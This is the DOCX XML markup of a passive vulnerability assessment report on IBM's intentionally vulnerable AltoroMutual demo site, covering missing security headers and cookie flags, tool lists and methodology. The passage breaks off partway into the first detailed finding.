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00"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">VULNERABILITY ASSESSMENT REPORT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A8C4E0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Security Evaluation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Application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AltoroMutual Online Banking (IBM Demo App)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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http://demo.testfire.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Passive / Non-Intrusive (No Active Exploitation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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April 21, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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v1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Confidential — Academic &amp; Portfolio Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Security Analyst</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E36C09"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DISCLAIMER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="595959"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This report was prepared for educational purposes and GitHub portfolio demonstration only. demo.testfire.net is an intentionally vulnerable application provided by IBM for security training. No illegal activity, active exploitation, or unauthorised access was performed during this assessment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>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This Vulnerability Assessment Report presents the findings of a passive, non-intrusive security evaluation of the AltoroMutual web application hosted at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">http://demo.testfire.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This application is an intentionally vulnerable banking demo created by IBM Corporation for security awareness and penetration testing training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment was conducted using industry-standard methodologies including passive HTTP header analysis, port enumeration, security header grading, and OWASP ZAP passive scanning. No active exploitation, brute force, or any form of intrusive testing was performed.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C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HIGH Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E36C09"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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>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LOW Risk</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INFORMATIONAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C00000" w:sz="1"/>
              <w:left w:val="single" w:color="C00000" w:sz="1"/>
              <w:bottom w:val="single" w:color="C00000" w:sz="1"/>
              <w:right w:val="single" w:color="C00000" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="595959"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E36C09"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="595959"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="375623" w:sz="1"/>
              <w:left w:val="single" w:color="375623" w:sz="1"/>
              <w:bottom w:val="single" w:color="375623" w:sz="1"/>
              <w:right w:val="single" w:color="375623" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="375623"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="595959"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9E8F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="595959"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key findings include the complete absence of critical HTTP security headers (Content Security Policy, HTTP Strict Transport Security, X-Frame-Options), insecure session cookie configuration, server version disclosure, and the lack of enforced HTTPS redirection. These vulnerabilities collectively represent a significant risk profile for any production equivalent of this application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate remediation is strongly recommended for all HIGH-risk findings. A full remediation plan with specific implementation guidance is provided in Section 8 of this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Scope of Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>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2.1  In-Scope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Target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http://demo.testfire.net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Java EE / Apache Tomcat (IBM AltoroMutual)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Ports Assessed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TCP 80 (HTTP), TCP 443 (HTTPS), TCP 8080 (Alt HTTP)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Protocols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HTTP/1.1, HTTPS/TLS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Assessment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April 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>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2.2  Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active exploitation or injection of any payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering or phishing attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service (DoS) or stress testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-party infrastructure or CDN providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Source code review or binary analysis</w:t>
      </w:r>
    </w:p>
    <w:p>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2.3  Assessment Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment was conducted entirely passively. All findings are based on observable HTTP responses, public header analysis, and standard security grading tools. No user accounts, sessions, or application data were accessed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Methodology</w:t>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This assessment followed the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework for passive reconnaissance and security header analysis. The testing lifecycle was conducted in four phases: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5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B3A5C"/>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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance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Passive information gathering: DNS, WHOIS, HTTP header collection via curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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B3A5C"/>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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Port &amp; Service Enumeration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Nmap scan on TCP 80, 443, 8080 to identify open ports and service banners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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B3A5C"/>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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated Passive Scan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OWASP ZAP passive spider and scanner — observing traffic, no active attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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B3A5C"/>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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual Verification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Browser DevTools and SecurityHeaders.com to confirm header grades and cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>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3.1  Standards Referenced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (2021 Edition)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115 — Technical Guide to Information Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE/SANS Top 25 Most Dangerous Software Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla Web Security Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBd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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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curl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7.88+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HTTP header retrieval, cookie flag inspection, server banner identification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Nmap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7.94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TCP port scanning, service version detection on ports 80, 443, 8080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OWASP ZAP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2.14 (Passive)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Automated passive scanning: missing headers, cookie issues, info disclosure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SecurityHeaders.com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Online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Automated security header grading (A–F scale) and header gap analysis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Browser DevTools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Chrome 124+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Manual inspection of response headers, Set-Cookie flags, JavaScript sources, Network tab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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Whois / nslookup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CLI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Domain registration data and DNS enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Findings Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBd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1560"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:t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7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Content Security Policy (CSP)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Security Headers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ZAP / curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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HTTP Strict Transport Security (HSTS)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Security Headers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curl / SecurityHeaders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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X-Frame-Options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Clickjacking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ZAP / curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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Server Version Disclosure (Apache Tomcat)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Info Disclosure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curl / Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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Insecure Session Cookie (Missing Secure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Cookie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ZAP / DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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HttpOnly Cookie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Cookie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ZAP / DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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No HTTPS Enforcement / HTTP Accessible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Transport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curl / Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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X-Content-Type-Options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Security Headers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ZAP / curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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VA-09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Referrer-Policy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Privacy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ZAP / curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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SecurityHeaders.com Grade: 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Informational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SecurityHeaders.com</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VA-11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Application Error Messages Exposed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Informational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Browser DevTools</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r>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Detailed Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBd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VA-01  |  Missing Content Security Policy (CSP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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A05:2021 – Security Misconfiguration</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CWE-693: Protection Mechanism Failure</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application does not return a Content-Security-Policy (CSP) HTTP response header. CSP is a critical browser security mechanism that instructs the browser which sources of scripts, styles, images, and other resources are trusted. Without it, any cross-site scripting (XSS) payload injected into the page will execute freely in the victim's browser with no browser-level mitigation.</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 | grep -i 'content-security'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># (no output — header is absent)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OWASP ZAP Alert:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Alert: Content Security Policy (CSP) Header Not Set</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
